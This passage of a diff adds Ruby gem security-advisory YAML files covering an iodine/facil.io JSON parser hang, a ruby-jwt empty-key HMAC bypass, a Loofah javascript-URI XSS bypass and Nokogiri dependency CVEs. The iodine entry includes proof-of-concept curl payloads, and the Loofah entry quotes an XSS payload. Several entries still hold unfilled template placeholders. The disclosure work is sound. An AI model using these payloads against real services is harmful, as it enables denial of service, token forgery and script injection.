+  Iodine.start
+  ```
+
+  Run:
+
+  ```bash
+  ruby iodine_json_parse_http_poc.rb
+  ```
+
+  Then in a second terminal:
+
+  ```bash
+  printf '[i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '[""i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  printf '{"a":""i' | curl --http1.1 -X POST --data-binary @- http://127.0.0.1:3000/
+  ```
+
+  On a vulnerable build, the server prints the `calling Iodine::JSON.parse...` line but never prints the `returned from Iodine::JSON.parse` line for these payloads.
+
+  ## Impact
+  This is a denial-of-service issue. An attacker who can supply JSON to an affected parser path can cause the process to spin indefinitely and consume CPU at roughly 100% of one core. In practice, the impact depends on whether an application exposes parser access to untrusted clients, but for services that do, a single crafted request can tie up a worker or thread until it is killed or restarted.
+
+  I would describe the impact as:
+
+  - Availability impact: high for affected parser entry points
+  - Confidentiality impact: none observed
+  - Integrity impact: none observed
+
+  ## Suggested Patch
+  Treat zero-consumption numeric parses as failures before accepting the token.
+
+  ```diff
+  diff --git a/lib/facil/fiobj/fio_json_parser.h b/lib/facil/fiobj/fio_json_parser.h
+  @@
+         uint8_t *tmp = pos;
+         long long i = fio_atol((char **)&tmp);
+         if (tmp > limit)
+           goto stop;
+  -      if (!tmp || JSON_NUMERAL[*tmp]) {
+  +      if (!tmp || tmp == pos || JSON_NUMERAL[*tmp]) {
+           tmp = pos;
+           double f = fio_atof((char **)&tmp);
+           if (tmp > limit)
+             goto stop;
+  -        if (!tmp || JSON_NUMERAL[*tmp])
+  +        if (!tmp || tmp == pos || JSON_NUMERAL[*tmp])
+             goto error;
+           fio_json_on_float(parser, f);
+           pos = tmp;
+  ```
+
+  This preserves permissive `inf` / `nan` handling when the float parser actually consumes input, but rejects bare `i` / `I` tokens that otherwise leave the cursor unchanged.
+
+  The same change should be mirrored to `iodine`'s vendored copy:
+
+  - `ext/iodine/fio_json_parser.h`
+
+
+  ## Impact
+  - `facil.io`
+    - Verified on `master` commit `162df84001d66789efa883eebb0567426d00148e` (`git describe`: `0.7.5-24-g162df840`)
+    - Verified on tagged releases `0.7.5` and `0.7.6`
+  - `iodine` Ruby gem
+    - Verified on repo commit `5bebba698d69023cf47829afe51052f8caa6c7f8`
+    - Verified on tag / gem version `v0.7.58`
+    - The gem vendors a copy of the vulnerable parser in `ext/iodine/fio_json_parser.h`
+severity: HIGH
+cvss:
+  score: 0.0
+  vectorString:
+references:
+- url: https://github.com/boazsegev/facil.io/security/advisories/GHSA-2x79-gwq3-vxxm
+- url: https://nvd.nist.gov/vuln/detail/CVE-2026-41146
+- url: https://github.com/boazsegev/facil.io/commit/5128747363055201d3ecf0e29bf0a961703c9fa0
+- url: https://github.com/advisories/GHSA-2x79-gwq3-vxxm
+publishedAt: '2026-04-14T23:41:06Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: iodine
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "<= 0.7.58"
+  firstPatchedVersion:

--- a/gems/jwt/CVE-2026-45363.yml
+++ b/gems/jwt/CVE-2026-45363.yml
@@ -1,0 +1,98 @@
+---
+gem: jwt
+cve: 2026-45363
+ghsa: c32j-vqhx-rx3x
+url: https://github.com/jwt/ruby-jwt/security/advisories/GHSA-c32j-vqhx-rx3x
+title: 'ruby-jwt: Empty-key HMAC bypass; cross-language sibling of CVE-2026-44351'
+date: 2026-05-18
+description: |-
+  `JWT.decode(token, '', true, algorithm: 'HS256')` accepts an attacker-forged token.
+  `OpenSSL::HMAC.digest('SHA256', '', payload)` returns a valid digest under an empty key, and no `raise
+    InvalidKeyError if key.empty?` precondition exists in the HMAC algorithm.
+
+  ```
+  JWT.decode(token, "", true, algorithm: 'HS256')
+    -> JWA::Hmac.verify(verification_key: "", ...)
+    -> OpenSSL::HMAC.digest('SHA256', "", signing_input) == signature
+  ```
+
+  The same path is reached when a keyfinder block or key_finder: argument returns "", nil, or an
+  array containing nil for an unknown key. JWT::Decode#find_key only rejects literal nil and empty
+  arrays, and JWT::JWA::Hmac silently coerces nil to "" (signing_key ||= '') before signing.
+
+  ```
+  JWT.decode(token, nil, true, algorithms: ['HS256']) { |_h| "" }
+    -> find_key returns ""               # "" && !Array("").empty? == true
+    -> JWA::Hmac.verify(verification_key: "", ...)
+    -> verifies
+  ```
+  Common application patterns that produce the unsafe value: `redis.get("kid:#{kid}").to_s`, ORM string columns with `default: ''`, `ENV['SECRET'] || '', Hash.new('')` lookups, [primary, fallback] where fallback may be nil. Applications passing a non-empty static key:, or whose keyfinder returns nil / raises on miss, are not affected.
+
+  The existing `enforce_hmac_key_length` option would block this but defaults to false. On OpenSSL ≥ 3.5 the empty-key HMAC.digest call no longer raises, so the OpenSSL-3.0 rescue in JWA::Hmac#sign does not fire.
+
+  Affects HS256/HS384/HS512 via both JWT.decode (positional key and block keyfinder) and
+  `JWT::EncodedToken#verify_signature!(key_finder:)`
+cvss_v3: 7.4
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- ">= 3.2.0"
+related:
+  url:
+  - https://github.com/jwt/ruby-jwt/security/advisories/GHSA-c32j-vqhx-rx3x
+  - https://github.com/jwt/ruby-jwt/commit/db560b769a07bd9724e77ff505011ac01872106f
+  - https://github.com/jwt/ruby-jwt/releases/tag/v3.2.0
+  - https://github.com/advisories/GHSA-c32j-vqhx-rx3x
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-c32j-vqhx-rx3x
+- type: CVE
+  value: CVE-2026-45363
+summary: 'ruby-jwt: Empty-key HMAC bypass; cross-language sibling of CVE-2026-44351'
+description: |-
+  `JWT.decode(token, '', true, algorithm: 'HS256')` accepts an attacker-forged token.
+  `OpenSSL::HMAC.digest('SHA256', '', payload)` returns a valid digest under an empty key, and no `raise
+    InvalidKeyError if key.empty?` precondition exists in the HMAC algorithm.
+
+  ```
+  JWT.decode(token, "", true, algorithm: 'HS256')
+    -> JWA::Hmac.verify(verification_key: "", ...)
+    -> OpenSSL::HMAC.digest('SHA256', "", signing_input) == signature
+  ```
+
+  The same path is reached when a keyfinder block or key_finder: argument returns "", nil, or an
+  array containing nil for an unknown key. JWT::Decode#find_key only rejects literal nil and empty
+  arrays, and JWT::JWA::Hmac silently coerces nil to "" (signing_key ||= '') before signing.
+
+  ```
+  JWT.decode(token, nil, true, algorithms: ['HS256']) { |_h| "" }
+    -> find_key returns ""               # "" && !Array("").empty? == true
+    -> JWA::Hmac.verify(verification_key: "", ...)
+    -> verifies
+  ```
+  Common application patterns that produce the unsafe value: `redis.get("kid:#{kid}").to_s`, ORM string columns with `default: ''`, `ENV['SECRET'] || '', Hash.new('')` lookups, [primary, fallback] where fallback may be nil. Applications passing a non-empty static key:, or whose keyfinder returns nil / raises on miss, are not affected.
+
+  The existing `enforce_hmac_key_length` option would block this but defaults to false. On OpenSSL ≥ 3.5 the empty-key HMAC.digest call no longer raises, so the OpenSSL-3.0 rescue in JWA::Hmac#sign does not fire.
+
+  Affects HS256/HS384/HS512 via both JWT.decode (positional key and block keyfinder) and
+  `JWT::EncodedToken#verify_signature!(key_finder:)`
+severity: HIGH
+cvss:
+  score: 7.4
+  vectorString: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
+references:
+- url: https://github.com/jwt/ruby-jwt/security/advisories/GHSA-c32j-vqhx-rx3x
+- url: https://github.com/jwt/ruby-jwt/commit/db560b769a07bd9724e77ff505011ac01872106f
+- url: https://github.com/jwt/ruby-jwt/releases/tag/v3.2.0
+- url: https://github.com/advisories/GHSA-c32j-vqhx-rx3x
+publishedAt: '2026-05-18T17:24:55Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: jwt
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 3.2.0"
+  firstPatchedVersion:
+    identifier: 3.2.0

--- a/gems/loofah/GHSA-2j22-pr5w-6gq8.yml
+++ b/gems/loofah/GHSA-2j22-pr5w-6gq8.yml
@@ -1,0 +1,93 @@
+---
+gem: loofah
+ghsa: 2j22-pr5w-6gq8
+url: https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
+title: Loofah has improper detection of disallowed URIs via `allowed_uri?`
+date: 2026-03-26
+description: |-
+  ## Summary
+
+  `Loofah::HTML5::Scrub.allowed_uri?` does not correctly reject `javascript:` URIs when the scheme is split by HTML entity-encoded control characters such as `&#13;` (carriage return), `&#10;` (line feed), or `&#9;` (tab).
+
+  ## Details
+
+  The `allowed_uri?` method strips literal control characters before decoding HTML entities. Payloads like `java&#13;script:alert(1)` survive the control character strip, then `&#13;` is decoded to a carriage return, producing `java\rscript:alert(1)`.
+
+  Note that the Loofah sanitizer's default `sanitize()` path is **not affected** because Nokogiri decodes HTML entities during parsing before Loofah evaluates the URI protocol. This issue only affects direct callers of the `allowed_uri?` string-level helper when passing HTML-encoded strings.
+
+  ## Impact
+
+  Applications that call `Loofah::HTML5::Scrub.allowed_uri?` to validate user-controlled URLs and then render approved URLs into `href` or other browser-interpreted URI attributes may be vulnerable to cross-site scripting (XSS).
+
+  This only affects Loofah `2.25.0`.
+
+  ## Mitigation
+
+  Upgrade to Loofah >= `2.25.1`.
+
+  ## Credit
+
+  Responsibly reported by HackOne user @smlee.
+cvss_v3: "<FILL IN IF AVAILABLE>"
+cvss_v4: "<FILL IN IF AVAILABLE>"
+unaffected_versions:
+- "< 2.25.0"
+patched_versions:
+- ">= 2.25.1"
+related:
+  url:
+  - https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
+  - https://github.com/flavorjones/loofah/commit/f4ebc9c5193dde759a57541062e490e86fc7c068
+  - https://github.com/flavorjones/loofah/releases/tag/v2.25.1
+  - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/loofah/GHSA-46fp-8f5p-pf2m.yml
+  - https://github.com/advisories/GHSA-2j22-pr5w-6gq8
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-2j22-pr5w-6gq8
+summary: Loofah has improper detection of disallowed URIs via `allowed_uri?`
+description: |-
+  ## Summary
+
+  `Loofah::HTML5::Scrub.allowed_uri?` does not correctly reject `javascript:` URIs when the scheme is split by HTML entity-encoded control characters such as `&#13;` (carriage return), `&#10;` (line feed), or `&#9;` (tab).
+
+  ## Details
+
+  The `allowed_uri?` method strips literal control characters before decoding HTML entities. Payloads like `java&#13;script:alert(1)` survive the control character strip, then `&#13;` is decoded to a carriage return, producing `java\rscript:alert(1)`.
+
+  Note that the Loofah sanitizer's default `sanitize()` path is **not affected** because Nokogiri decodes HTML entities during parsing before Loofah evaluates the URI protocol. This issue only affects direct callers of the `allowed_uri?` string-level helper when passing HTML-encoded strings.
+
+  ## Impact
+
+  Applications that call `Loofah::HTML5::Scrub.allowed_uri?` to validate user-controlled URLs and then render approved URLs into `href` or other browser-interpreted URI attributes may be vulnerable to cross-site scripting (XSS).
+
+  This only affects Loofah `2.25.0`.
+
+  ## Mitigation
+
+  Upgrade to Loofah >= `2.25.1`.
+
+  ## Credit
+
+  Responsibly reported by HackOne user @smlee.
+severity: LOW
+cvss:
+  score: 0.0
+  vectorString:
+references:
+- url: https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
+- url: https://github.com/flavorjones/loofah/commit/f4ebc9c5193dde759a57541062e490e86fc7c068
+- url: https://github.com/flavorjones/loofah/releases/tag/v2.25.1
+- url: https://github.com/rubysec/ruby-advisory-db/blob/master/gems/loofah/GHSA-46fp-8f5p-pf2m.yml
+- url: https://github.com/advisories/GHSA-2j22-pr5w-6gq8
+publishedAt: '2026-03-26T22:19:02Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: loofah
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "= 2.25.0"
+  firstPatchedVersion:
+    identifier: 2.25.1

--- a/gems/nokogiri/GHSA-fq42-c5rg-92c2.yml
+++ b/gems/nokogiri/GHSA-fq42-c5rg-92c2.yml
@@ -1,0 +1,139 @@
+---
+gem: nokogiri
+ghsa: fq42-c5rg-92c2
+url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2
+title: Vulnerable dependencies in Nokogiri
+date: 2022-02-25
+description: |
+  ### Summary
+
+  Nokogiri [v1.13.2](https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.2) upgrades two of its packaged dependencies:
+
+  - vendored libxml2 from v2.9.12 to [v2.9.13](https://download.gnome.org/sources/libxml2/2.9/libxml2-2.9.13.news)
+  - vendored libxslt from v1.1.34 to [v1.1.35](https://download.gnome.org/sources/libxslt/1.1/libxslt-1.1.35.news)
+
+  Those library versions address the following upstream CVEs:
+
+  - libxslt: [CVE-2021-30560](https://nvd.nist.gov/vuln/detail/CVE-2021-30560) (CVSS 8.8, High severity)
+  - libxml2: [CVE-2022-23308](https://nvd.nist.gov/vuln/detail/CVE-2022-23308) (Unspecified severity, see more information below)
+
+  Those library versions also address numerous other issues including performance improvements, regression fixes, and bug fixes, as well as memory leaks and other use-after-free issues that were not assigned CVEs.
+
+  Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.13.2`, and only if the _packaged_ libraries are being used. If you've overridden defaults at installation time to use _system_ libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` and `libxslt` release announcements.
+
+
+  ### Mitigation
+
+  Upgrade to Nokogiri `>= 1.13.2`.
+
+  Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link an older version Nokogiri against external libraries libxml2 `>= 2.9.13` and libxslt `>= 1.1.35`, which will also address these same CVEs.
+
+
+  ### Impact
+
+  #### libxslt [CVE-2021-30560](https://nvd.nist.gov/vuln/detail/CVE-2021-30560)
+
+  - CVSS3 score: 8.8 (High)
+  - Fixed by https://gitlab.gnome.org/GNOME/libxslt/-/commit/50f9c9c
+
+  All versions of libxslt prior to v1.1.35 are affected.
+
+  Applications using **untrusted** XSL stylesheets to transform XML are vulnerable to a denial-of-service attack and should be upgraded immediately.
+
+
+  #### libxml2 [CVE-2022-23308](https://nvd.nist.gov/vuln/detail/CVE-2022-23308)
+
+  - As of the time this security advisory was published, there is no officially published information available about this CVE's severity. The above NIST link does not yet have a published record, and the libxml2 maintainer has declined to provide a severity score.
+  - Fixed by https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12
+  - Further explanation is at https://mail.gnome.org/archives/xml/2022-February/msg00015.html
+
+  The upstream commit and the explanation linked above indicate that an application may be vulnerable to a denial of service, memory disclosure, or code execution if it parses an **untrusted** document with parse options `DTDVALID` set to true, and `NOENT` set to false.
+
+  An analysis of these parse options:
+
+  - While `NOENT` is off by default for Document, DocumentFragment, Reader, and Schema parsing, it is on by default for XSLT (stylesheet) parsing in Nokogiri v1.12.0 and later.
+  - `DTDVALID` is an option that Nokogiri does not set for any operations, and so this CVE applies only to applications setting this option explicitly.
+
+  It seems reasonable to assume that any application explicitly setting the parse option `DTDVALID` when parsing **untrusted** documents is vulnerable and should be upgraded immediately.
+cvss_v3: "<FILL IN IF AVAILABLE>"
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- ">= 1.13.2"
+related:
+  url:
+  - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2
+  - https://github.com/advisories/GHSA-fq42-c5rg-92c2
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-fq42-c5rg-92c2
+summary: Vulnerable dependencies in Nokogiri
+description: |
+  ### Summary
+
+  Nokogiri [v1.13.2](https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.2) upgrades two of its packaged dependencies:
+
+  - vendored libxml2 from v2.9.12 to [v2.9.13](https://download.gnome.org/sources/libxml2/2.9/libxml2-2.9.13.news)
+  - vendored libxslt from v1.1.34 to [v1.1.35](https://download.gnome.org/sources/libxslt/1.1/libxslt-1.1.35.news)
+
+  Those library versions address the following upstream CVEs:
+
+  - libxslt: [CVE-2021-30560](https://nvd.nist.gov/vuln/detail/CVE-2021-30560) (CVSS 8.8, High severity)
+  - libxml2: [CVE-2022-23308](https://nvd.nist.gov/vuln/detail/CVE-2022-23308) (Unspecified severity, see more information below)
+
+  Those library versions also address numerous other issues including performance improvements, regression fixes, and bug fixes, as well as memory leaks and other use-after-free issues that were not assigned CVEs.
+
+  Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.13.2`, and only if the _packaged_ libraries are being used. If you've overridden defaults at installation time to use _system_ libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` and `libxslt` release announcements.
+
+
+  ### Mitigation
+
+  Upgrade to Nokogiri `>= 1.13.2`.
+
+  Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link an older version Nokogiri against external libraries libxml2 `>= 2.9.13` and libxslt `>= 1.1.35`, which will also address these same CVEs.
+
+
+  ### Impact
+
+  #### libxslt [CVE-2021-30560](https://nvd.nist.gov/vuln/detail/CVE-2021-30560)
+
+  - CVSS3 score: 8.8 (High)
+  - Fixed by https://gitlab.gnome.org/GNOME/libxslt/-/commit/50f9c9c
+
+  All versions of libxslt prior to v1.1.35 are affected.
+
+  Applications using **untrusted** XSL stylesheets to transform XML are vulnerable to a denial-of-service attack and should be upgraded immediately.
+
+
+  #### libxml2 [CVE-2022-23308](https://nvd.nist.gov/vuln/detail/CVE-2022-23308)
+
+  - As of the time this security advisory was published, there is no officially published information available about this CVE's severity. The above NIST link does not yet have a published record, and the libxml2 maintainer has declined to provide a severity score.
+  - Fixed by https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12
+  - Further explanation is at https://mail.gnome.org/archives/xml/2022-February/msg00015.html
+
+  The upstream commit and the explanation linked above indicate that an application may be vulnerable to a denial of service, memory disclosure, or code execution if it parses an **untrusted** document with parse options `DTDVALID` set to true, and `NOENT` set to false.
+
+  An analysis of these parse options:
+
+  - While `NOENT` is off by default for Document, DocumentFragment, Reader, and Schema parsing, it is on by default for XSLT (stylesheet) parsing in Nokogiri v1.12.0 and later.
+  - `DTDVALID` is an option that Nokogiri does not set for any operations, and so this CVE applies only to applications setting this option explicitly.
+
+  It seems reasonable to assume that any application explicitly setting the parse option `DTDVALID` when parsing **untrusted** documents is vulnerable and should be upgraded immediately.
+severity: HIGH
+cvss:
+  score: 0.0
+  vectorString:
+references:
+- url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2
+- url: https://github.com/advisories/GHSA-fq42-c5rg-92c2
+publishedAt: '2022-02-25T20:32:09Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: nokogiri
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 1.13.2"
+  firstPatchedVersion:
+    identifier: 1.13.2

--- a/gems/nokogiri/GHSA-gx8x-g87m-h5q6.yml
+++ b/gems/nokogiri/GHSA-gx8x-g87m-h5q6.yml
@@ -1,0 +1,93 @@
+---
+gem: nokogiri
+ghsa: gx8x-g87m-h5q6
+url: https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv
+title: Denial of Service (DoS) in Nokogiri on JRuby
+date: 2022-04-11
+description: |
+  ## Summary
+
+  Nokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv). That CVE is rated 7.5 (High Severity).
+
+  See [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) for more information.
+
+  Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.
+
+
+  ## Mitigation
+
+  Upgrade to Nokogiri `>= 1.13.4`.
+
+
+  ## Impact
+
+  ### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml
+
+  - **Severity**: High 7.5
+  - **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption
+  - **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.
+  - **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
+cvss_v3: 7.5
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- ">= 1.13.4"
+related:
+  url:
+  - https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv
+  - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-gx8x-g87m-h5q6
+  - https://nvd.nist.gov/vuln/detail/CVE-2022-24839
+  - https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d
+  - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+  - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer
+  - https://github.com/advisories/GHSA-gx8x-g87m-h5q6
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-gx8x-g87m-h5q6
+summary: Denial of Service (DoS) in Nokogiri on JRuby
+description: |
+  ## Summary
+
+  Nokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv). That CVE is rated 7.5 (High Severity).
+
+  See [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) for more information.
+
+  Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.
+
+
+  ## Mitigation
+
+  Upgrade to Nokogiri `>= 1.13.4`.
+
+
+  ## Impact
+
+  ### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml
+
+  - **Severity**: High 7.5
+  - **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption
+  - **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.
+  - **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
+severity: HIGH
+cvss:
+  score: 7.5
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+references:
+- url: https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv
+- url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-gx8x-g87m-h5q6
+- url: https://nvd.nist.gov/vuln/detail/CVE-2022-24839
+- url: https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d
+- url: https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+- url: https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer
+- url: https://github.com/advisories/GHSA-gx8x-g87m-h5q6
+publishedAt: '2022-04-11T21:38:11Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: nokogiri
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 1.13.4"
+  firstPatchedVersion:
+    identifier: 1.13.4

--- a/gems/nokogiri/GHSA-v6gp-9mmm-c6p5.yml
+++ b/gems/nokogiri/GHSA-v6gp-9mmm-c6p5.yml
@@ -1,0 +1,71 @@
+---
+gem: nokogiri
+ghsa: v6gp-9mmm-c6p5
+url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5
+title: Out-of-bounds Write in zlib affects Nokogiri
+date: 2022-04-11
+description: "## Summary\n\nNokogiri v1.13.4 updates the vendored zlib from 1.2.11
+  to 1.2.12, which addresses [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032).
+  That CVE is scored as CVSS 7.4 \"High\" on the NVD record as of 2022-04-05.\n\nPlease
+  note that this advisory only applies to the CRuby implementation of Nokogiri `<
+  1.13.4`, and only if the packaged version of `zlib` is being used. Please see [this
+  document](https://nokogiri.org/LICENSE-DEPENDENCIES.html#default-platform-release-ruby)
+  for a complete description of which platform gems vendor `zlib`. If you've overridden
+  defaults at installation time to use system libraries instead of packaged libraries,
+  you should instead pay attention to your distro's `zlib` release announcements.
+  \n\n## Mitigation\n\nUpgrade to Nokogiri `>= v1.13.4`.\n\n## Impact\n\n### [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032)
+  in zlib\n\n- **Severity**: High\n- **Type**: [CWE-787](https://cwe.mitre.org/data/definitions/787.html)
+  Out of bounds write\n- **Description**: zlib before 1.2.12 allows memory corruption
+  when deflating (i.e., when compressing) if the input has many distant matches.\n\n"
+cvss_v3: 7.5
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
+- ">= 1.13.4"
+related:
+  url:
+  - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5
+  - https://nvd.nist.gov/vuln/detail/CVE-2018-25032
+  - https://github.com/advisories/GHSA-jc36-42cf-vqwj
+  - https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+  - https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer
+  - https://github.com/advisories/GHSA-v6gp-9mmm-c6p5
+# GitHub advisory data below - **Remove this data before committing**
+# Use this data to write patched_versions (and potentially unaffected_versions) above
+---
+identifiers:
+- type: GHSA
+  value: GHSA-v6gp-9mmm-c6p5
+summary: Out-of-bounds Write in zlib affects Nokogiri
+description: "## Summary\n\nNokogiri v1.13.4 updates the vendored zlib from 1.2.11
+  to 1.2.12, which addresses [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032).
+  That CVE is scored as CVSS 7.4 \"High\" on the NVD record as of 2022-04-05.\n\nPlease
+  note that this advisory only applies to the CRuby implementation of Nokogiri `<
+  1.13.4`, and only if the packaged version of `zlib` is being used. Please see [this
+  document](https://nokogiri.org/LICENSE-DEPENDENCIES.html#default-platform-release-ruby)
+  for a complete description of which platform gems vendor `zlib`. If you've overridden
+  defaults at installation time to use system libraries instead of packaged libraries,
+  you should instead pay attention to your distro's `zlib` release announcements.
+  \n\n## Mitigation\n\nUpgrade to Nokogiri `>= v1.13.4`.\n\n## Impact\n\n### [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032)
+  in zlib\n\n- **Severity**: High\n- **Type**: [CWE-787](https://cwe.mitre.org/data/definitions/787.html)
+  Out of bounds write\n- **Description**: zlib before 1.2.12 allows memory corruption
+  when deflating (i.e., when compressing) if the input has many distant matches.\n\n"
+severity: HIGH
+cvss:
+  score: 7.5
+  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+references:
+- url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5
+- url: https://nvd.nist.gov/vuln/detail/CVE-2018-25032
+- url: https://github.com/advisories/GHSA-jc36-42cf-vqwj
+- url: https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4
+- url: https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer
+- url: https://github.com/advisories/GHSA-v6gp-9mmm-c6p5
+publishedAt: '2022-04-11T21:21:28Z'
+withdrawnAt:
+vulnerabilities:
+- package:
+    name: nokogiri
+    ecosystem: RUBYGEMS
+  vulnerableVersionRange: "< 1.13.4"
+  firstPatchedVersion:
+    identifier: 1.13.4

--- a/gems/nokogiri/GHSA-xxx9-3xcr-gjj3.yml
+++ b/gems/nokogiri/GHSA-xxx9-3xcr-gjj3.yml
@@ -1,0 +1,87 @@
+---
+gem: nokogiri
+ghsa: xxx9-3xcr-gjj3
+url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xxx9-3xcr-gjj3
+title: XML Injection in Xerces Java affects Nokogiri
+date: 2022-04-11
+description: |+
+  ## Summary
+
+  Nokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to 2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437). That CVE is scored as CVSS 6.5 "Medium" on the NVD record.
+
+  Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.
+
+  ## Mitigation
+
+  Upgrade to Nokogiri `>= v1.13.4`.
+
+  ## Impact
+
+  ### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J
+
+  - **Severity**: Medium
+  - **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection)
+  - **Description**: There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.
+  - **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj
+
+cvss_v3: 6.5
+cvss_v4: "<FILL IN IF AVAILABLE>"
+patched_versions:
